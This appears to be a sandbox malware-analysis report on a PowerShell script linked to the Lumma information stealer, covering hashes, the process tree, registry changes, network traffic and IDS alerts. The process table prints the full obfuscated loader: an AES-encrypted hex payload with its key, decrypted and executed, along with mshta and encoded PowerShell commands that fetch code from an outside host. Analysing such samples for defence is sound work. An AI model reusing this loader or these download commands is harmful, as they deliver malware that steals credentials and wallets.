| File name: | human-verification5.b-cdn.net.ps1 |
| Full analysis: | https://app.any.run/tasks/130085a5-a5d1-4177-9a33-1957e21e4a41 |
| Verdict: | Malicious activity |
| Threats: | Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat. |
| Analysis date: | September 06, 2024, 12:13:55 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with no line terminators |
| MD5: | 9719DE2EB2EC48309BB12EA275BF0946 |
| SHA1: | 51FAA7CB4FBAB31ED9EF6BBFD797671F1A98241A |
| SHA256: | 55B96B221A8AED3376EA4ABF3F3CA89D07FA23BCE039563A7E0F6C6E887EE2A9 |
| SSDEEP: | 3:VSJJLNyAmarBO/tmt55akaa1ZdHUwkdncu2O5QkxUi0kGSakG2CR:snyuk854kLHfklcu2HpXkGDknY |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 508 | "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | 0driver-updater-setup.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BitLocker To Go Reader Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1432 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1748 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function bQDLgde($oQxUDlVo){return -split ($oQxUDlVo -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$EhrTEH = bQDLgde('9B6D971D5F7C297DED49FADDE1F937D4D8A424E086588BC050C86B8777115123B5D38BFD3008C0B3551D940E4E7A61892A091417BDCFF6988118FF5FF24F6790BE64F80654A2414249F3AC0579458E12464C10E43B0FB3AB7A8040045297E97A14DF720AD096A745FFC0D0AF0664C5D90E127C761A5DB9CEED586053161A19E24F89364AA704A5E4E65533A3848DAD9C04BEBD38F84D80DAAEF55915B740C99E84C02AAF7F13C0A11A290DA5482899E7F93F3D6A1515669AFFE1DD646421AF845D048DE8DC47AF137CD388A3A475C793D86BC1D2270B513B752C8E36B5DFC174E9B85BFBBDB5D0155040207AD5B422923FA9CC93DD4344BC7C560C832CA3554F6BDED7F87BF329708D2DE0387EDC1A526C6DAFAF5E74BD7BCEE78039E2EDD21B1E4C2CFFE4F73EEEE13DCF6C099D0E0CB54637E8C9E79DACDCAAB35F2638EEAC650DB5F24E132A4901795707E4D4CA0E9E794092A0DFF20585AF6F2B68A3B47356CE25A2E95C8B5956296399CBF0DB673D62AB670FEF7D079D6420B987CEF4F6C18DBE896425951FF12FA007FC33B79FE861202D25C6044C82BA4940A70A84DA45562FEF4BC3447E06467CB6744D9C715C3A8C210679C3F9F3928A0DF5B0FB0F19E317496DC0E915DACBFFF983CC31D8A458E66566B57CE8112603C9A925247BABF286D669BF7232A11E01FE1B2623D0CEA2781C8C114B302B0166B8A045514622C7343D59AD47E59890D112F128BEDD6B5CFBF5A52B33B398E829232F0FF5301EC221180721A22F1BE1332E690D2FAC74F8B852281370E55C96F7372C45C730BA3DEE9D82C8D362B644042B9E2CE87156429C51CA2F8F0AC8CE5141D4CC26F9E387C75F9BA78EA647407006B0B62144FDED8B19CEA4CBA533974C3ADDCE74344D44E2B12A928B0A39E92FB54031790D9AD92B2714C788804A56F0F575226FA89F7AEB49FAFF9459029A0E569E3FF2F75324BB52C410D732D673A68B4348EA279CC0A70CB4CD8DC50C06BC9BCC0F0E8E21A84BF9E4857BA1DD6C7CC5438F565C260C70E1F9145DB0C17A7CC1911D3E724793D3BD3B124D3929F2B1EEFA86480B6F12A57CA59F96A9AD7AF2EA1DD6AD4ABCC4A27590D647DE3144C2A357E924692A5E804CE83FFEF28EEC5305D0255826E7EA154CF041E24BCBE7FC50E55677B0B50717CB1DFC701E349DA365890E9F041F0E3B7BFC3B6647DEAAFA99E7253EEF3034F07FED3E5641AD1D4AAE04CF2D7F9F01D2999C4CD6DA64E34C913258917917B3137C8C147ABDFA5AE82DCCE5320C35A5F0751550C71F6E21ABDFB0870618E516457B2E028C52751E18D385642C63DF065F5DC2B69F3BE596AF4D59102CF9');$RWwNh = [System.Security.Cryptography.Aes]::Create();$RWwNh.Key = bQDLgde('4D4873624D72536853585A7A4C494E48');$RWwNh.IV = New-Object byte[] 16;$BtwlChsO = $RWwNh.CreateDecryptor();$QcIJBhdPP = $BtwlChsO.TransformFinalBlock($EhrTEH, 0, $EhrTEH.Length);$LaTvqsayd = [System.Text.Encoding]::Utf8.GetString($QcIJBhdPP);$BtwlChsO.Dispose();& $LaTvqsayd.Substring(0,3) $LaTvqsayd.Substring(3) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1920 | "C:\WINDOWS\system32\mshta.exe" https://clicktogo.click/downloads/tr08 | C:\Windows\System32\mshta.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2256 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3784 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\human-verification5.b-cdn.net.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5088 | "C:\Users\admin\AppData\Local\Temp\0driver-updater-setup.exe" | C:\Users\admin\AppData\Local\Temp\0driver-updater-setup.exe | powershell.exe | ||||||||||||
User: admin Company: Nexova Integrity Level: MEDIUM Description: UpdateHub is an app that simplifies updating software on your computer. Exit code: 666 Version: 2.3.4 Modules
| |||||||||||||||
| 5276 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6160 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (1920) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (1920) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (1920) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (1748) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (1748) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (1748) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (1748) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (1748) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (1748) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (1748) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1748 | powershell.exe | C:\Users\admin\AppData\Local\Temp\0driver-updater-setup.exe | — | |
MD5:— | SHA256:— | |||
| 3784 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1VONXTIY87SF7MRQSJ7M.temp | binary | |
MD5:1A2F0DC4CD81C8F2A4B4864726DE76AF | SHA256:8D3822CF857817319B3713D09FD4847538E489FB8B8F4A8DC6527164356A5BBD | |||
| 3784 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF12a1f5.TMP | binary | |
MD5:D040F64E9E7A2BB91ABCA5613424598E | SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670 | |||
| 3784 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_d5lwu0vi.rel.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3784 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:1A2F0DC4CD81C8F2A4B4864726DE76AF | SHA256:8D3822CF857817319B3713D09FD4847538E489FB8B8F4A8DC6527164356A5BBD | |||
| 5276 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fqohknok.i4x.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1920 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12 | der | |
MD5:7FB5FA1534DCF77F2125B2403B30A0EE | SHA256:33A39E9EC2133230533A686EC43760026E014A3828C703707ACBC150FE40FD6F | |||
| 3784 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hhwj0v3j.umf.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5276 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3lrcxu0l.ki4.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5276 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:E0954C8065C9BCCEF3CA7D4971B336BB | SHA256:ADE7E013ECF4993264AAC47B3A1831268948F83C09509E64584D4BCB769F6269 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3652 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
7128 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
1920 | mshta.exe | GET | 200 | 142.250.186.131:80 | http://c.pki.goog/r/r4.crl | unknown | — | — | whitelisted |
1920 | mshta.exe | GET | 200 | 142.250.186.131:80 | http://c.pki.goog/r/gsr1.crl | unknown | — | — | whitelisted |
1184 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
1184 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2120 | MoUsoCoreWorker.exe | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6248 | RUXIMICS.exe | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
7128 | svchost.exe | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1920 | mshta.exe | 188.114.96.3:443 | clicktogo.click | CLOUDFLARENET | NL | unknown |
1920 | mshta.exe | 142.250.186.131:80 | c.pki.goog | GOOGLE | US | whitelisted |
7128 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
7128 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
1748 | powershell.exe | 188.114.96.3:443 | clicktogo.click | CLOUDFLARENET | NL | unknown |
3260 | svchost.exe | 40.113.110.67:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
clicktogo.click |
| unknown |
c.pki.goog |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2256 | svchost.exe | A Network Trojan was detected | ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) |
2256 | svchost.exe | A Network Trojan was detected | ET MALWARE Lumma Stealer Domain in DNS Lookup (froytnewqowv .shop) |
2256 | svchost.exe | A Network Trojan was detected | ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) |
2256 | svchost.exe | A Network Trojan was detected | ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) |
508 | BitLockerToGo.exe | A Network Trojan was detected | ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) |
508 | BitLockerToGo.exe | A Network Trojan was detected | STEALER [ANY.RUN] Lumma Stealer TLS Connection |
508 | BitLockerToGo.exe | A Network Trojan was detected | ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) |
508 | BitLockerToGo.exe | A Network Trojan was detected | ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) |
508 | BitLockerToGo.exe | A Network Trojan was detected | ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) |
508 | BitLockerToGo.exe | A Network Trojan was detected | ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) |